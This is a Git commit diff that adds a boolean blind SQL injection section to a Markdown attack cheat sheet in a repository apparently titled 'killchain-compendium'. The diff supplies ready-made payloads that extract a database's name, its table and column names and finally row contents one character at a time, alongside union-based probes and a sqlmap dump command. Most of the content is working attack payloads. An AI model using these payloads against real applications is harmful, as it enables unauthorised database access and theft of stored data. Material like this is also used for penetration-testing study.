whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

added boolean blind information

This commit is contained in:
gurkenhabicht 2024-02-04 23:39:37 +01:00
parent 1e166ee37e
commit 4c16a2a545
1 changed files with 48 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

52
Exploits/Databases/SQL Injection.md
View File

@ -57,22 +57,66 @@ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
### Blind injection ### Blind injection
* A blind injection methods tries to guess characters not by returned values but by how the DB behaves to your request A blind injection methods tries to guess characters not by returned values
but by how the DB behaves to your request
```sh ```sh
http://example.com/?id=1' and substr((select database()),1,1) < 105 --+ http://example.com/?id=1' and substr((select database()),1,1) < 105 --+
``` ```
```sh ```sh
http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+ http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
``` ```
* Function substr(string, start, length) * Function substr(string, start, length)
* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` * sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump`
__How do you go forward when you know, that there is a possible boolean blind injection?__
You want to get
* Database name
* Table name
* Column name
and watch out for return values, status codes, if you are logged in a session
inside the browser, etc., ... .
Start at the databasename character on position 1, after that 2 and so on via a
POST request
```sql
username=admin'+and+substring(database(),1,1)="a"+#&password='
username=admin'+and+substring(database(),2,1)="b"+#&password='
```
Next, find the characters of the tablename via
```sql
username=admin'+and+substring((select+table_name+from+information_schema.tables+where+table_schema="<found_databasename>"+limit+0,1),1,1)+=+"a"+#&password='
username=admin'+and+substring((select+table_name+from+information_schema.tables+where+table_schema="<found_databasename>"+limit+0,1),2,1)+=+"b"+#&password='
```
Find the column_name of the table
```sql
username=admin'+and+substring((select+column_name+from+information_schema.columns+where+table_name="<found_tablename>"+limit+0,1),1,1)+=+"a"+#&password='
username=admin'+and+substring((select+column_name+from+information_schema.columns+where+table_name="<found_tablename>"+limit+0,1),2,1)+=+"b"+#&password='
```
Query content of the table and columns found via
```sql
username=admin'+and+substring((select+<found_columnname>+from+<found_tablename>+limit+0,1),1,1)="a"+#&password='
```
### Union based ### Union based
Union based injections is an incremental and cautios approach. Union based injections is an incremental and cautios approach.
Start by trying to provoke errors to validate a possible injection. Start by trying to provoke errors to validate a possible injection.
* __First method__ check by order until error occurs * __First method__ check by order until error occurs
```sql ```sql
' order by 1 -- - ' order by 1 -- -
' order by 2 -- - ' order by 2 -- -